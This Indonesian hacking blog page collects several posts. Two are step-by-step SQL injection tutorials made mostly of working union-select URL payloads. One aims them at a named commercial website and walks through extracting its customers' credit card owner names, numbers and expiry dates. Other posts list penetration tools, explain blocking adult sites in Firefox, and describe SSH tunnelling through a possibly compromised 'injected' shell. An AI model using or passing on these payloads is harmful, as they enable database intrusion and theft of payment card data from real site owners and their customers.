Cara Hacking Website dengan Teknik SQL Injection

Pagi semua temen-temen di dumay!!!semga di pagi hari ini kita di beri kesehatan untuk selalu bisa beraktifitas seperti biasanya.amin!!!oke..di pagi hari ini saya akan membahas dan mempostingkan bagaimana cara membobol/Hacking Website dengan Teknik SQL Injection. Sebelum kita membahas masalah ini mari kita mengenal apa itu SQL Injection,apa difinisinya dan apa kegunaannya!!!SQL Injection Sering digunakan untuk menjebol atau merusak database suatu website atau blog.

Pengertian Dari SQL Injection Atau Injeksi SQL - Injeksi SQL atau SQL Injection (Dalam bahasa inggris) adalah sebuah teknik dimana dengan menggunakan/menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi/web server. Celah ini terjadi ketika login/masukan pengguna.

Tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah suatu contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip(Script) diimbuhkan/dimasukan di dalam bahasa yang lain.

(Source Wikipedia)

SQL Injection adalah jenis aksi hacking pada keamanan komputer di mana seorang penyerang/attacker bisa mendapatkan akses ke basis data di dalam sistem(Sistem Utama). SQL injection yaitu serangan yang mirip dengan serangan XSS dalam arti bahwa penyerang memanfaatkan aplikasi vektor dan juga dengan Common dalam serangan XSS.

SQL Injection atau Injeksi SQL exploits dan sejenisnya adalah hasil interfacing sebuah bahasa lewat informasi melalui bahasa lain . Dalam hal SQL injection, sebuah bahasa pemrograman seperti PHP atau Perl mengakses database melalui SQL query. Jika data yang diterima dari pengguna akhir yang dikirim langsung ke database dan tidak disaring dengan benar, maka yang penyerang dapat menyisipkan perintah SQL nya sebagai bagian dari input.

(de-kill.blogspot.com)

Lebih singkatnya

 SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya.

 oke sekarang teman-teman dumay udah paham dan mengerti apa itu SQL Injection ada apa kegunaannya.sekarang kita beralih ke topik pembahasan sebelumnya yaitu mengenaik Bagaimana cara Hacking Website dengan Teknik SQL Injaction Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:

karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
Carilah target
Misal: site:/berita.php?id=1

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
site:/berita.php?id=1' atau
site:/berita.php?id=-1

[ Step 2 ]
Mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah: order by

Contoh:

site:/berita.php?id=-1+order+by+1-- atau
site:/berita.php?id=-1+order+by+1/*

teliti secara step by step (satupersatu)...
Misal:

site:/berita.php?id=-1+order+by+1--
site:/berita.php?id=-1+order+by+2--
site:/berita.php?id=-1+order+by+3--
site:/berita.php?id=-1+order+by+4--

Sehingga muncul error atau hilang pesan error...
Misal: site:berita.php?id=-1+order+by+9--

Berarti yang kita ambil adalah sampai angka 8
Menjadi site:/berita.php?id=-1+order+by+8--
[ Step 3 ]
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: site:/berita.php?id=-1+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: site:/berita.php?id=-1+union+select+1,2,3,4,version(),6,7,8-- atau
site:/berita.php?id=-1+union+select+1,2,3,4,@@version,6,7,8--

Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
Untuk menampilkan table yang ada pada web tersebut adalah
perintah table_name >>> dimasukan pada angka yangg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

site:/berita.php?id=-1+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
untuk menampilkan semua isi dari table tersebut adalah
perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ?tables+where+table_schema=database()--
[ Step 6 ]
Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
Website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

site:/berita.php?id=-1+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--
[ Step 7 ]
Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

Contoh kata yang keluar adalah id,username,password

Contoh : site:/berita.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

[ Step 8 ]

Tahap terakhir mencari halaman admin atau login.


  sampai pada tahap terakahir ini pembahasan tentang Sql Injaction,mungkin bila temen-temen kurang begitu jelas silahkan belajar sendiri atau silahkan mencari buku/browser tentang sql injection ini. kita sama-sama belajar bila ada kesalahan dalam tulisan dan cara pembahasaan maka saya minta maaf dan semoga pembahasan ini bermanfaat buat saya dan temen-temen di dumay smuanya!!!amiiii.....



By@Si OTAK MATI

Read more »

Posted in: Hacking,New,Tutorial,Web dan Blog

Cara Memblokir Situs Porno Di Mozzila

Ini mungkin hanya salah satu cara untuk memblokir situs Porno, cara ini kita menggunakan Mozilla Firefox. yang saya ketahui sampek sakarang masih blom ada cara memblokir situs porno di Google Chroome. padahal saat ini sudah banyak pemakai internet yang menggunakan Google Chroome dari pada mozzila sendiri. oke duech langsung ajach yaaa...
Disini kita akan menggunakan Fasilitas Addons yang disediakan Oleh Mozilla sendiri, Addons yang akan kita gunakan Ini yaitu Procon LIte.
Langkah-langkahnya adalah :
1. Masuk Ke Situs Addons Mozilla :
https://addons.mozilla.org/de/firefox/addon/1803

langkah selanjutnya tinggal Klik Add to FireFox 
2. Kemudian Muncul halaman Lisensi, tanpa Basa basi langsung saja Klik Accept And Install

3. Tunggu Hingga Muncul Kotak Dialog seperti dibawah ini :

setelah muncul kotak dialog Software Installation, langsung saja klik Install Now
4. Proses instalasi seperti gambar dibawah ini :

Setelah Proses Installasi selesai 100 %, kemudian Restart FireFox anda!!!
5. Langkah selanjutnya adalah Mengeset Bloking SItus Porno.
Masuk Ke Setting add-ons ProCon Latte

Klik Tab Menu Tools pada FireFox Anda Kemudian Klik Add-ons

lalu akan Muncul seperti ini :

di Pengarutan add-ons ProCOn Latte ini Anda Bisa mengeset password agar memberikan acces Edit hanya yang memiliki passwordnya......
Klik Pada Tab Main Filter, disini ada beberapa pengaturan dimana anda bisa mengeset apakah situs yang di blok akan di re-direct ke situs lain atau tidak, juga pengaturan apabila user membuka situs porno akan muncul "Tulisan Peringatan"

Checklist Enable Explicit Material Filter Kemudian Klik Edit List..........( langkah Selanjutnya lihat paling bawah!!!)

Custom Warning Massege : Tulisan Peringatan untuk user apabila membuka situs Porno
contoh saya mengeset : "Maaf Situs ini tidak bisa dibuka karena mengandung " keyword" atau " url" Porno.
Untuk Redirect ke situs silahkan set sesuka anda.
6. DIsini langkah yang paling di tunggu-tunggu, karena disinilah langkah untuk mengeblok situs-SItus Porno tersebut, setelah mengeset diatas kemudian klik " Edit List " :

Gambar: List Bloked WOrd dan Blocked Sites

disini kita bisa mengeset Mana URL yang berbau Porno Ataupun Hanya Konten Situsnya saja yang kita BLOK......

Contoh di list Block Words Kita sisipkan Kata "ngentot", maka semua situs yang di dalam halamannya terdapat kata "ngentot" akan Terblok.

COntoh di List Block Sites kita sisipkan kata "Maria ozawa", maka apabila address di FireFox terdapat kata maria ozawa, akan muncul Tulisan PEringatan.
Contoh Pengeblokan Situs :

Gambar : menjunjukan Tulisan Peringatan ketika User seach di google.com dengan menggunakan kata " maria ozawa"
"Maaf Situs ini Tidak bisa di buka karena mengandung "keyword" atau "url" PORNO, sara ataupun kekerasan By Operator "
Itu Salah satu cara untuk mengeblok situs POrno menggunakan Fasilitas dari Mozila, dan hanya bisa di terapkan di WEb-Browser FireFox. Semoga Bermanfaat !!!



By@Si OTAK MATI

Read more »

Posted in: Hacking,Tips

10 Tools Hacking

1.Nessus

“Nessus” pertama kali dibuat oleh Renaud Deraison pada tahun 1998 dan disebarkan untuk komunitas internet secara bebas, bermanfaat, ter-update dengan baik serta mudah untuk digunakan.

Nessus adalah sebuah program untuk mencari kelemahan pada sebuah sistem komputer. Menurut situs resminya di www.nessus.org, tool ini telah digunakan oleh lebih dari 75.000 organisasi dan perusahaan di seluruh dunia.

2.Snort

Snort adalah sebuah IDS, yaitu tool untuk mencegah dan mendeteksi serangan terhadap sistem komputer. Vendor dari snort mengklaim bahwa tool ini telah didownload berjuta-juta kali dari situs mereka. Anda mungkin berminat untuk mencobanya, silahkan download tool ini di www.snort.org.

3.Kismet

Kismet adalah sebuah tool untuk mendeteksi koneksi wireless(mendukung lalu lintas 802.11b, 802.11a, dan 802.11g ) , menangkap paket dalam sebuah sistem jaringan dan menjadi sebuah IDS (intrusion detection System).

Untuk mencari tahu lebih lanjut mengenai kismet, anda dapat mengunjungi situs http://www.kismetwireless.net atau masuk ke #kismet irc.freenode.net.

4.Metasploit Framework

Metasploit Framework adalah sebuah proyek open source untuk mengembangkan, menguji dan menggunakan kode eksploit. Dibuat dengan bahasa Perl sebagai fondasi dasar dan dan terdiri dari komponen pelengkap yang telah dicompile dengan bahasa C, assembler dan Python. Metasploit Framework dapat berjalan pada sistem operasi UNIX, Linux dan Windows. Keterangan yang lebih detail dapat anda cari di http://www.metasploit.com.

5.Netcat

Netcat adalah sebuah tool networking utility yang dapat membaca dan menulis data pada koneksi sebuah jaringan melalui protokol TCP/IP.

Fitur yang terdapat pada Netcat antara lain :

• Koneksi keluar dan masuk melalui protokol UDP ataupun TCP dengan port yang digunakan..
• Tunneling mode, tunneling dari UDP ke TCP, memetakan parameter dalam jaringan (source port/interface, listening port/interface, dan mengijinkan remote host melakukan koneksi ke tunnel)
• Port scanner, untuk mendeteksi port yang terbuka.
• Buffered send-mode dan hexdump RFC854 telnet.

6.Hping

Hping merupakan sebuah tool serba guna. Tool ini dapat digunakan untuk menguji kemampuan firewall, mencari port yang terbuka, menguji keamanan jaringan dengan menggunakan berbagai jenis protokol, mendapatkan informasi sistem operasi, mengevaluasi protokol TCP/IP.

7.TCPDump

Tcpdump juga merupakan sebuah sniffer. Admin jaringan menggunakan tool ini untuk memonitor lalu lintas dan menganalisa permasalahan jika terjadi gangguan. Menurut informasi di http://www-iepm.slac.stanford.edu/monitoring/passive/tcpdump.html , Tcpdump menggunakan paket filter dari UNIX BSD untuk meng-capture data(BPF / BSD Packet Filter).BPF menerima salinan dari driver pengirim dan penerima paket.Pengguna tcpdump juga dapat menyaring paket sesuai dengan keinginan.

8. John The Ripper

Sebuah password cracker dari jaman nenek moyang para hacker yang masih menjadi 10 besar tool favorit. Berikut adalah keterangan dari pembuat John The Ripper.

“John the Ripper is a password cracker, currently available for UNIX, DOS,WinNT/Win95. Its primary purpose is to detect weak UNIX passwords. It has been tested with Linux x86/Alpha/SPARC, FreeBSD x86, OpenBSD x86, Solaris 2.x SPARC and x86, Digital UNIX, AIX, HP-UX, and IRIX”.

9. Cain And Abel

Cain & Abel adalah sebuah tool untuk masalah password. Tool ini dapat mengumpulkanpassword dengan metode network sniffing, meng-crack password menggunakan Dictionary attack, Brute-Force and Cryptanalysis attacks, merekam pembicaraan VoIP (Voice Over Internet Protocol), meng-crack jaringan wireless, menganalisa trafik dalam jaringan. www.oxid.it

10. WireShark / Ethereal

Wireshark / Ethereal adalah sebuah tool untuk menganalisa protokol jaringan. Fungsinya juga sebagai sebuah sniffer. Memantau lalu lintas internet. Wireshark

dapat berjalan pada Windows, MAC OS X, dan Linux. www.wireshark.org

Tertarik? Pelajari dan pahami saja cara penggunaan 10 tool tsb. Kita memang tdk akan semudah itu menjadi hacker hebat hanya dengan mengandalkan 10 tool diatas. Tapi tool2 tsb sudah diakui oleh semua tingkatan Hacker. Kan bisa menjadi tambahan bagi anda2 yang ingin menggeluti sekuriti komputer secara mendalam.

By@Si OTAK MATI

Read more »

Posted in: Hacking

Php shell Injection,Php Shell Backdooring,Patching

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Read more »

Posted in: Hacking,Jaringan,Tutorial

Hacking with SQL Injection

Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection…  ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk…sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!

Huyee…siapkan sebungkus starmild + kopi susu  
langsung sajoo, misal pada site http://www.scootsusa.com/, kita cari link yang ada bugnya…
kita dapet :
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3
Tinggal tambahin tanda petik satu (’) sajoo untuk test Vulnerbilitiesnya 

alhasil muncul keterangan error seperti berikut :
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
select * FROM customer_testimonials WHERE testimonials_id = 3\'

Sekarang kita kasi perintah order by…buat nyari ada berapa kolom di sana…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true…

ok..kita dapet yang true di binary 8
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.Selanjutnya kita bajak pake union select.

http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--
hasilnya :
Testimonial by 4
3
6

Langsung saja misal kita ambil angka 3 atau 6 juga bisa. 
kita cek versi sqlnya doeloe…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--
hasilnya :
Testimonial by 4
5.0.67.d7-ourdelta-log
6
ternyata sqlnya versi 5… lanjut bajak si kacrut… 

kemudian cari table dan coloumnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--

nah lhoo kluar semua tuh nama tablenya…xixiixixixixi 
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC
Biasanya CC ada di table orders.Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah… 

sekarang kita cari coloumnya… 
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya…
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--

Alhasil keluar tuh coloum²nya…hohoho
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll

ok skarang kita masukkan data² tadi dan haslinya… 
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--

dan…eng..ing..eng…xixixixiixixixi 

semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection.…hanya untuk pemblajaran saja bila ada hal" yang diluar skenario Admin tidak bertanggung jawab.. 

By@Si OTAK MATI

Read more »

Posted in: Hacking

SSH tunnelling with putty

Tutor ini dibuat sebetulnya bukan untuk di buat sembarangan..tp apa salahnya kita mempelajarinya secara dalam!!

yuk di praktekin tuk… 

1. siapin shell/server tujuan untuk di remote (terserah entah shell inject ato shell resmi)

2. download aplikasi putty yang berfungsi sebagai alat untuk remote shell
3. jalankan putty dan konfigurasi seperti berikut :

pada category pilih session
- pada host isikan nama domain shell/ip publicnya
- masukkan port sshnya (defaultnya port 22)
- connection type pilih ssh


pada category pilih connection » SSH » Tunnels
- pada port isi dengan port tunnell yang di inginkan (defaultnya 1080)
- destenationnya isi dengan ip localhost (127.0.0.1 atau tulis localhost)
- dan pilih dynamic lalu klik add hingga menjadi seperti gambar berikut :


- kemudian kembali ke category » session dan langsung klik OPEN
- jika sudah muncul jendela putty masukkan user dan passwdnya, seperti gambar di bawah.

setelah muncul seperti gambar diatas (dan putty jangan di tutup) pada mozilla/browser lain setting proxynya…

- tools » option

- pilih advance » network » setting


- pada configure proxies to access internet pilih manual proxy
- pada SOCKS Host isikan ip localhost (127.0.0.1)
- pada port isi dengan port yang kita setting di putty (kali ini pake default ya itu 1080)
- setelah itu klik OK
- dan SSH tunnelling langsung bisa di nikmati….
ok sekian dolo yach...good luck gan!!!! 

By@Si OTAK MATI

Read more »

Posted in: Hacking